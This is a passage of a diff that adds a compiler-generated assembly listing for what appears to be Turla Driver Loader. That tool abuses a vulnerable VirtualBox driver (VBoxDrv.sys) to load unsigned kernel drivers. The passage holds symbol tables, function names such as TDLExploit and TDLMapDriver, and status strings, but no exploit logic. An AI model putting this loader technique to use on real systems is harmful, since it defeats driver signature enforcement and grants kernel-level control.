+PUBLIC ??_C@_1FK@JFBCCPOL@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ ; `string'
+PUBLIC ??_C@_1FK@IKAIMODD@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ ; `string'
+PUBLIC ??_C@_1FA@PHCFNMLE@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAe?$AAn?$AAt@ ; `string'
+PUBLIC ??_C@_1FO@DNLPIHKO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ ; `string'
+PUBLIC ??_C@_1GO@OPJFPMDE@?$AA?2?$AA?$DP?$AA?$DP?$AA?2?$AAg?$AAl?$AAo?$AAb?$AAa?$AAl?$AAr?$AAo?$AAo?$AAt?$AA?2@ ; `string'
+PUBLIC ??_C@_1DC@DNGHMHCN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAf?$AAi?$AAl@ ; `string'
+PUBLIC ??_C@_1EA@GBOCHCBM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ ; `string'
+PUBLIC ??_C@_1GK@NPKGCMED@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAr?$AAi?$AAg?$AAi?$AAn?$AAa?$AAl?$AA?5?$AAV@ ; `string'
+PUBLIC ??_C@_1IE@LNHNMFMD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ ; `string'
+PUBLIC ??_C@_1GI@DHNLBGMJ@?$AAU?$AAs?$AAa?$AAg?$AAe?$AA?3?$AA?5?$AAl?$AAo?$AAa?$AAd?$AAe?$AAr?$AA?5?$AAD@ ; `string'
+PUBLIC ??_C@_1DE@GHKPOPNF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAf?$AAi?$AAl?$AAe@ ; `string'
+PUBLIC ??_C@_1EM@EIBHHECD@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@ ; `string'
+PUBLIC ??_C@_1ME@FJMKDEEO@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@ ; `string'
+PUBLIC ??_C@_1FI@KELGEADI@?$AAA?$AAn?$AAo?$AAt?$AAh?$AAe?$AAr?$AA?5?$AAi?$AAn?$AAs?$AAt?$AAa?$AAn?$AAc@ ; `string'
+PUBLIC ??_C@_1DI@DFEFPEIF@?$AAU?$AAn?$AAs?$AAu?$AAp?$AAp?$AAo?$AAr?$AAt?$AAe?$AAd?$AA?5?$AAW?$AAi?$AAn@ ; `string'
+PUBLIC ??_C@_1BO@HKPJGJI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AAv@ ; `string'
+PUBLIC ??_C@_13JOFGPIOO@?$AA?4@ ; `string'
+PUBLIC ??_C@_1BA@EMMAAKIL@?$AA?5?$AAb?$AAu?$AAi?$AAl?$AAd?$AA?5@ ; `string'
+PUBLIC ??_C@_1JG@OOKLIHEB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAt?$AAe?$AAc?$AAt?$AAe?$AAd?$AA?5?$AAV@ ; `string'
+EXTRN __imp_GetCommandLineW:PROC
+EXTRN __imp_GetFileAttributesW:PROC
+EXTRN __imp_CloseHandle:PROC
+EXTRN __imp_DeviceIoControl:PROC
+EXTRN __imp_Sleep:PROC
+EXTRN __imp_ExitProcess:PROC
+EXTRN __imp_GetSystemDirectoryW:PROC
+EXTRN __imp_GetModuleHandleW:PROC
+EXTRN __imp_SetConsoleTitleW:PROC
+EXTRN __imp_RegCloseKey:PROC
+EXTRN __imp_RegOpenKeyExW:PROC
+EXTRN __imp_CloseServiceHandle:PROC
+EXTRN __imp_OpenSCManagerW:PROC
+EXTRN __imp_LdrGetProcedureAddress:PROC
+EXTRN __imp_LdrLoadDll:PROC
+EXTRN __imp_RtlInitString:PROC
+EXTRN __imp_RtlInitUnicodeString:PROC
+EXTRN __imp_RtlGetVersion:PROC
+EXTRN __imp_RtlImageNtHeader:PROC
+EXTRN __imp_NtDeleteFile:PROC
+EXTRN __imp_NtAllocateVirtualMemory:PROC
+EXTRN __imp_NtFreeVirtualMemory:PROC
+EXTRN _strend_w:PROC
+EXTRN _strcpy_w:PROC
+EXTRN _strcat_w:PROC
+EXTRN ultostr_w:PROC
+EXTRN ultohex_w:PROC
+EXTRN u64tohex_w:PROC
+EXTRN GetCommandLineParamW:PROC
+EXTRN supGetNtOsBase:PROC
+EXTRN supQueryResourceData:PROC
+EXTRN supBackupVBoxDrv:PROC
+EXTRN supWriteBufferToFile:PROC
+EXTRN supIsObjectExists:PROC
+EXTRN supStopVBoxService:PROC
+EXTRN cuiInitialize:PROC
+EXTRN cuiPrintTextW:PROC
+EXTRN scmInstallDriver:PROC
+EXTRN scmStartDriver:PROC
+EXTRN scmOpenDevice:PROC
+EXTRN scmStopDriver:PROC
+EXTRN scmRemoveDriver:PROC
+EXTRN memcpy:PROC
+; COMDAT pdata
+pdata SEGMENT
+$pdata$RtlSecureZeroMemory DD imagerel $LN4
+ DD imagerel $LN4+27
+ DD imagerel $unwind$RtlSecureZeroMemory
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$TDLVBoxInstalled DD imagerel $LN5
+ DD imagerel $LN5+83
+ DD imagerel $unwind$TDLVBoxInstalled
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$TDLGetProcAddress DD imagerel $LN5
+ DD imagerel $LN5+88
+ DD imagerel $unwind$TDLGetProcAddress
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$TDLResolveKernelImport DD imagerel $LN19
+ DD imagerel $LN19+167
+ DD imagerel $unwind$TDLResolveKernelImport
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$TDLExploit DD imagerel $LN26
+ DD imagerel $LN26+1256
+ DD imagerel $unwind$TDLExploit
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$TDLMapDriver DD imagerel $LN35
+ DD imagerel $LN35+1671
+ DD imagerel $unwind$TDLMapDriver
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$TDLStartVulnerableDriver DD imagerel $LN28
+ DD imagerel $LN28+590
+ DD imagerel $unwind$TDLStartVulnerableDriver
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$TDLStopVulnerableDriver DD imagerel $LN16
+ DD imagerel $LN16+353
+ DD imagerel $unwind$TDLStopVulnerableDriver
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$TDLProcessCommandLine DD imagerel $LN11
+ DD imagerel $LN11+177
+ DD imagerel $unwind$TDLProcessCommandLine
+pdata ENDS
+; COMDAT pdata
+pdata SEGMENT
+$pdata$TDLMain DD imagerel $LN14
+ DD imagerel $LN14+361
+ DD imagerel $unwind$TDLMain
+pdata ENDS
+; COMDAT ??_C@_1JG@OOKLIHEB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAt?$AAe?$AAc?$AAt?$AAe?$AAd?$AA?5?$AAV@
+CONST SEGMENT
+??_C@_1JG@OOKLIHEB@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAe?$AAt?$AAe?$AAc?$AAt?$AAe?$AAd?$AA?5?$AAV@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'D', 00H, 'e', 00H
+ DB 't', 00H, 'e', 00H, 'c', 00H, 't', 00H, 'e', 00H, 'd', 00H, ' '
+ DB 00H, 'V', 00H, 'i', 00H, 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H
+ DB 'l', 00H, 'B', 00H, 'o', 00H, 'x', 00H, ' ', 00H, 's', 00H, 'o'
+ DB 00H, 'f', 00H, 't', 00H, 'w', 00H, 'a', 00H, 'r', 00H, 'e', 00H
+ DB ' ', 00H, 'i', 00H, 'n', 00H, 's', 00H, 't', 00H, 'a', 00H, 'l'
+ DB 00H, 'l', 00H, 'a', 00H, 't', 00H, 'i', 00H, 'o', 00H, 'n', 00H
+ DB ',', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e'
+ DB 00H, 'r', 00H, ' ', 00H, 'b', 00H, 'a', 00H, 'c', 00H, 'k', 00H
+ DB 'u', 00H, 'p', 00H, ' ', 00H, 'w', 00H, 'i', 00H, 'l', 00H, 'l'
+ DB 00H, ' ', 00H, 'b', 00H, 'e', 00H, ' ', 00H, 'd', 00H, 'o', 00H
+ DB 'n', 00H, 'e', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1BA@EMMAAKIL@?$AA?5?$AAb?$AAu?$AAi?$AAl?$AAd?$AA?5@
+CONST SEGMENT
+??_C@_1BA@EMMAAKIL@?$AA?5?$AAb?$AAu?$AAi?$AAl?$AAd?$AA?5@ DB ' ', 00H, 'b'
+ DB 00H, 'u', 00H, 'i', 00H, 'l', 00H, 'd', 00H, ' ', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_13JOFGPIOO@?$AA?4@
+CONST SEGMENT
+??_C@_13JOFGPIOO@?$AA?4@ DB '.', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1BO@HKPJGJI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AAv@
+CONST SEGMENT
+??_C@_1BO@HKPJGJI@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAW?$AAi?$AAn?$AAd?$AAo?$AAw?$AAs?$AA?5?$AAv@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'W', 00H, 'i', 00H
+ DB 'n', 00H, 'd', 00H, 'o', 00H, 'w', 00H, 's', 00H, ' ', 00H, 'v'
+ DB 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1DI@DFEFPEIF@?$AAU?$AAn?$AAs?$AAu?$AAp?$AAp?$AAo?$AAr?$AAt?$AAe?$AAd?$AA?5?$AAW?$AAi?$AAn@
+CONST SEGMENT
+??_C@_1DI@DFEFPEIF@?$AAU?$AAn?$AAs?$AAu?$AAp?$AAp?$AAo?$AAr?$AAt?$AAe?$AAd?$AA?5?$AAW?$AAi?$AAn@ DB 'U'
+ DB 00H, 'n', 00H, 's', 00H, 'u', 00H, 'p', 00H, 'p', 00H, 'o', 00H
+ DB 'r', 00H, 't', 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'W', 00H, 'i'
+ DB 00H, 'n', 00H, 'N', 00H, 'T', 00H, ' ', 00H, 'v', 00H, 'e', 00H
+ DB 'r', 00H, 's', 00H, 'i', 00H, 'o', 00H, 'n', 00H, 0dH, 00H, 0aH
+ DB 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1FI@KELGEADI@?$AAA?$AAn?$AAo?$AAt?$AAh?$AAe?$AAr?$AA?5?$AAi?$AAn?$AAs?$AAt?$AAa?$AAn?$AAc@
+CONST SEGMENT
+??_C@_1FI@KELGEADI@?$AAA?$AAn?$AAo?$AAt?$AAh?$AAe?$AAr?$AA?5?$AAi?$AAn?$AAs?$AAt?$AAa?$AAn?$AAc@ DB 'A'
+ DB 00H, 'n', 00H, 'o', 00H, 't', 00H, 'h', 00H, 'e', 00H, 'r', 00H
+ DB ' ', 00H, 'i', 00H, 'n', 00H, 's', 00H, 't', 00H, 'a', 00H, 'n'
+ DB 00H, 'c', 00H, 'e', 00H, ' ', 00H, 'r', 00H, 'u', 00H, 'n', 00H
+ DB 'n', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ',', 00H, ' ', 00H, 'c'
+ DB 00H, 'l', 00H, 'o', 00H, 's', 00H, 'e', 00H, ' ', 00H, 'i', 00H
+ DB 't', 00H, ' ', 00H, 'b', 00H, 'e', 00H, 'f', 00H, 'o', 00H, 'r'
+ DB 00H, 'e', 00H, 0dH, 00H, 0aH, 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1ME@FJMKDEEO@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@
+CONST SEGMENT
+??_C@_1ME@FJMKDEEO@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@ DB 'T'
+ DB 00H, 'u', 00H, 'r', 00H, 'l', 00H, 'a', 00H, ' ', 00H, 'D', 00H
+ DB 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'L'
+ DB 00H, 'o', 00H, 'a', 00H, 'd', 00H, 'e', 00H, 'r', 00H, ' ', 00H
+ DB 'v', 00H, '1', 00H, '.', 00H, '1', 00H, '.', 00H, '5', 00H, ' '
+ DB 00H, 's', 00H, 't', 00H, 'a', 00H, 'r', 00H, 't', 00H, 'e', 00H
+ DB 'd', 00H, 0dH, 00H, 0aH, 00H, '(', 00H, 'c', 00H, ')', 00H, ' '
+ DB 00H, '2', 00H, '0', 00H, '1', 00H, '6', 00H, ' ', 00H, '-', 00H
+ DB ' ', 00H, '2', 00H, '0', 00H, '1', 00H, '9', 00H, ' ', 00H, 'T'
+ DB 00H, 'D', 00H, 'L', 00H, ' ', 00H, 'P', 00H, 'r', 00H, 'o', 00H
+ DB 'j', 00H, 'e', 00H, 'c', 00H, 't', 00H, 0dH, 00H, 0aH, 00H, 'S'
+ DB 00H, 'u', 00H, 'p', 00H, 'p', 00H, 'o', 00H, 'r', 00H, 't', 00H
+ DB 'e', 00H, 'd', 00H, ' ', 00H, 'x', 00H, '6', 00H, '4', 00H, ' '
+ DB 00H, 'O', 00H, 'S', 00H, ' ', 00H, ':', 00H, ' ', 00H, '7', 00H
+ DB ' ', 00H, 'a', 00H, 'n', 00H, 'd', 00H, ' ', 00H, 'a', 00H, 'b'
+ DB 00H, 'o', 00H, 'v', 00H, 'e', 00H, 0dH, 00H, 0aH, 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1EM@EIBHHECD@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@
+CONST SEGMENT
+??_C@_1EM@EIBHHECD@?$AAT?$AAu?$AAr?$AAl?$AAa?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAL?$AAo@ DB 'T'
+ DB 00H, 'u', 00H, 'r', 00H, 'l', 00H, 'a', 00H, ' ', 00H, 'D', 00H
+ DB 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'L'
+ DB 00H, 'o', 00H, 'a', 00H, 'd', 00H, 'e', 00H, 'r', 00H, ' ', 00H
+ DB 'v', 00H, '1', 00H, '.', 00H, '1', 00H, '.', 00H, '5', 00H, ' '
+ DB 00H, '(', 00H, '1', 00H, '9', 00H, '/', 00H, '0', 00H, '4', 00H
+ DB '/', 00H, '1', 00H, '9', 00H, ')', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1DE@GHKPOPNF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAf?$AAi?$AAl?$AAe@
+CONST SEGMENT
+??_C@_1DE@GHKPOPNF@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAI?$AAn?$AAp?$AAu?$AAt?$AA?5?$AAf?$AAi?$AAl?$AAe@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'I', 00H, 'n', 00H
+ DB 'p', 00H, 'u', 00H, 't', 00H, ' ', 00H, 'f', 00H, 'i', 00H, 'l'
+ DB 00H, 'e', 00H, ' ', 00H, 'n', 00H, 'o', 00H, 't', 00H, ' ', 00H
+ DB 'f', 00H, 'o', 00H, 'u', 00H, 'n', 00H, 'd', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1GI@DHNLBGMJ@?$AAU?$AAs?$AAa?$AAg?$AAe?$AA?3?$AA?5?$AAl?$AAo?$AAa?$AAd?$AAe?$AAr?$AA?5?$AAD@
+CONST SEGMENT
+??_C@_1GI@DHNLBGMJ@?$AAU?$AAs?$AAa?$AAg?$AAe?$AA?3?$AA?5?$AAl?$AAo?$AAa?$AAd?$AAe?$AAr?$AA?5?$AAD@ DB 'U'
+ DB 00H, 's', 00H, 'a', 00H, 'g', 00H, 'e', 00H, ':', 00H, ' ', 00H
+ DB 'l', 00H, 'o', 00H, 'a', 00H, 'd', 00H, 'e', 00H, 'r', 00H, ' '
+ DB 00H, 'D', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H
+ DB 'T', 00H, 'o', 00H, 'L', 00H, 'o', 00H, 'a', 00H, 'd', 00H, 0aH
+ DB 00H, 0dH, 00H, 'e', 00H, '.', 00H, 'g', 00H, '.', 00H, ' ', 00H
+ DB 'l', 00H, 'o', 00H, 'a', 00H, 'd', 00H, 'e', 00H, 'r', 00H, ' '
+ DB 00H, 'm', 00H, 'y', 00H, 'd', 00H, 'r', 00H, 'v', 00H, '.', 00H
+ DB 's', 00H, 'y', 00H, 's', 00H, 0dH, 00H, 0aH, 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1IE@LNHNMFMD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@
+CONST SEGMENT
+??_C@_1IE@LNHNMFMD@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'U', 00H, 'n', 00H
+ DB 'e', 00H, 'x', 00H, 'p', 00H, 'e', 00H, 'c', 00H, 't', 00H, 'e'
+ DB 00H, 'd', 00H, ' ', 00H, 'e', 00H, 'r', 00H, 'r', 00H, 'o', 00H
+ DB 'r', 00H, ' ', 00H, 'w', 00H, 'h', 00H, 'i', 00H, 'l', 00H, 'e'
+ DB 00H, ' ', 00H, 'r', 00H, 'e', 00H, 's', 00H, 't', 00H, 'o', 00H
+ DB 'r', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'o', 00H, 'r'
+ DB 00H, 'i', 00H, 'g', 00H, 'i', 00H, 'n', 00H, 'a', 00H, 'l', 00H
+ DB ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r'
+ DB 00H, ' ', 00H, 'f', 00H, 'r', 00H, 'o', 00H, 'm', 00H, ' ', 00H
+ DB 'b', 00H, 'a', 00H, 'c', 00H, 'k', 00H, 'u', 00H, 'p', 00H, 00H
+ DB 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1GK@NPKGCMED@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAr?$AAi?$AAg?$AAi?$AAn?$AAa?$AAl?$AA?5?$AAV@
+CONST SEGMENT
+??_C@_1GK@NPKGCMED@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAO?$AAr?$AAi?$AAg?$AAi?$AAn?$AAa?$AAl?$AA?5?$AAV@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'O', 00H, 'r', 00H
+ DB 'i', 00H, 'g', 00H, 'i', 00H, 'n', 00H, 'a', 00H, 'l', 00H, ' '
+ DB 00H, 'V', 00H, 'i', 00H, 'r', 00H, 't', 00H, 'u', 00H, 'a', 00H
+ DB 'l', 00H, 'B', 00H, 'o', 00H, 'x', 00H, ' ', 00H, 'd', 00H, 'r'
+ DB 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'r', 00H
+ DB 'e', 00H, 's', 00H, 't', 00H, 'o', 00H, 'r', 00H, 'e', 00H, 'd'
+ DB 00H, ' ', 00H, 'f', 00H, 'r', 00H, 'o', 00H, 'm', 00H, ' ', 00H
+ DB 'b', 00H, 'a', 00H, 'c', 00H, 'k', 00H, 'u', 00H, 'p', 00H, 00H
+ DB 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1EA@GBOCHCBM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@
+CONST SEGMENT
+??_C@_1EA@GBOCHCBM@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
+ DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'r', 00H, 'e', 00H, 'm'
+ DB 00H, 'o', 00H, 'v', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H
+ DB 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' '
+ DB 00H, 'f', 00H, 'i', 00H, 'l', 00H, 'e', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1DC@DNGHMHCN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAf?$AAi?$AAl@
+CONST SEGMENT
+??_C@_1DC@DNGHMHCN@?$AAL?$AAd?$AAr?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAf?$AAi?$AAl@ DB 'L'
+ DB 00H, 'd', 00H, 'r', 00H, ':', 00H, ' ', 00H, 'D', 00H, 'r', 00H
+ DB 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'f', 00H, 'i'
+ DB 00H, 'l', 00H, 'e', 00H, ' ', 00H, 'r', 00H, 'e', 00H, 'm', 00H
+ DB 'o', 00H, 'v', 00H, 'e', 00H, 'd', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1GO@OPJFPMDE@?$AA?2?$AA?$DP?$AA?$DP?$AA?2?$AAg?$AAl?$AAo?$AAb?$AAa?$AAl?$AAr?$AAo?$AAo?$AAt?$AA?2@
+CONST SEGMENT
+??_C@_1GO@OPJFPMDE@?$AA?2?$AA?$DP?$AA?$DP?$AA?2?$AAg?$AAl?$AAo?$AAb?$AAa?$AAl?$AAr?$AAo?$AAo?$AAt?$AA?2@ DB '\'
+ DB 00H, '?', 00H, '?', 00H, '\', 00H, 'g', 00H, 'l', 00H, 'o', 00H
+ DB 'b', 00H, 'a', 00H, 'l', 00H, 'r', 00H, 'o', 00H, 'o', 00H, 't'
+ DB 00H, '\', 00H, 's', 00H, 'y', 00H, 's', 00H, 't', 00H, 'e', 00H
+ DB 'm', 00H, 'r', 00H, 'o', 00H, 'o', 00H, 't', 00H, '\', 00H, 's'
+ DB 00H, 'y', 00H, 's', 00H, 't', 00H, 'e', 00H, 'm', 00H, '3', 00H
+ DB '2', 00H, '\', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e'
+ DB 00H, 'r', 00H, 's', 00H, '\', 00H, 'V', 00H, 'B', 00H, 'o', 00H
+ DB 'x', 00H, 'D', 00H, 'r', 00H, 'v', 00H, '.', 00H, 's', 00H, 'y'
+ DB 00H, 's', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1FO@DNLPIHKO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@
+CONST SEGMENT
+??_C@_1FO@DNLPIHKO@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAE?$AAr?$AAr?$AAo?$AAr?$AA?5?$AAr?$AAe?$AAm?$AAo@ DB 'S'
+ DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'E', 00H, 'r', 00H
+ DB 'r', 00H, 'o', 00H, 'r', 00H, ' ', 00H, 'r', 00H, 'e', 00H, 'm'
+ DB 00H, 'o', 00H, 'v', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H
+ DB 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' '
+ DB 00H, 'e', 00H, 'n', 00H, 't', 00H, 'r', 00H, 'y', 00H, ' ', 00H
+ DB 'f', 00H, 'r', 00H, 'o', 00H, 'm', 00H, ' ', 00H, 'r', 00H, 'e'
+ DB 00H, 'g', 00H, 'i', 00H, 's', 00H, 't', 00H, 'r', 00H, 'y', 00H
+ DB 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1FA@PHCFNMLE@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAe?$AAn?$AAt@
+CONST SEGMENT
+??_C@_1FA@PHCFNMLE@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAD?$AAr?$AAi?$AAv?$AAe?$AAr?$AA?5?$AAe?$AAn?$AAt@ DB 'S'
+ DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'D', 00H, 'r', 00H
+ DB 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, ' ', 00H, 'e', 00H, 'n'
+ DB 00H, 't', 00H, 'r', 00H, 'y', 00H, ' ', 00H, 'r', 00H, 'e', 00H
+ DB 'm', 00H, 'o', 00H, 'v', 00H, 'e', 00H, 'd', 00H, ' ', 00H, 'f'
+ DB 00H, 'r', 00H, 'o', 00H, 'm', 00H, ' ', 00H, 'r', 00H, 'e', 00H
+ DB 'g', 00H, 'i', 00H, 's', 00H, 't', 00H, 'r', 00H, 'y', 00H, 00H
+ DB 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1FK@IKAIMODD@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@
+CONST SEGMENT
+??_C@_1FK@IKAIMODD@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAU?$AAn?$AAe?$AAx?$AAp?$AAe?$AAc?$AAt?$AAe?$AAd@ DB 'S'
+ DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'U', 00H, 'n', 00H
+ DB 'e', 00H, 'x', 00H, 'p', 00H, 'e', 00H, 'c', 00H, 't', 00H, 'e'
+ DB 00H, 'd', 00H, ' ', 00H, 'e', 00H, 'r', 00H, 'r', 00H, 'o', 00H
+ DB 'r', 00H, ' ', 00H, 'w', 00H, 'h', 00H, 'i', 00H, 'l', 00H, 'e'
+ DB 00H, ' ', 00H, 'u', 00H, 'n', 00H, 'l', 00H, 'o', 00H, 'a', 00H
+ DB 'd', 00H, 'i', 00H, 'n', 00H, 'g', 00H, ' ', 00H, 'd', 00H, 'r'
+ DB 00H, 'i', 00H, 'v', 00H, 'e', 00H, 'r', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1FK@JFBCCPOL@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@
+CONST SEGMENT
+??_C@_1FK@JFBCCPOL@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAV?$AAu?$AAl?$AAn?$AAe?$AAr?$AAa?$AAb?$AAl?$AAe@ DB 'S'
+ DB 00H, 'C', 00H, 'M', 00H, ':', 00H, ' ', 00H, 'V', 00H, 'u', 00H
+ DB 'l', 00H, 'n', 00H, 'e', 00H, 'r', 00H, 'a', 00H, 'b', 00H, 'l'
+ DB 00H, 'e', 00H, ' ', 00H, 'd', 00H, 'r', 00H, 'i', 00H, 'v', 00H
+ DB 'e', 00H, 'r', 00H, ' ', 00H, 's', 00H, 'u', 00H, 'c', 00H, 'c'
+ DB 00H, 'e', 00H, 's', 00H, 's', 00H, 'f', 00H, 'u', 00H, 'l', 00H
+ DB 'l', 00H, 'y', 00H, ' ', 00H, 'u', 00H, 'n', 00H, 'l', 00H, 'o'
+ DB 00H, 'a', 00H, 'd', 00H, 'e', 00H, 'd', 00H, 00H, 00H ; `string'
+CONST ENDS
+; COMDAT ??_C@_1GA@CFGLDEGI@?$AAS?$AAC?$AAM?$AA?3?$AA?5?$AAC?$AAa?$AAn?$AAn?$AAo?$AAt?$AA?5?$AAo?$AAp?$AAe@
+CONST SEGMENT
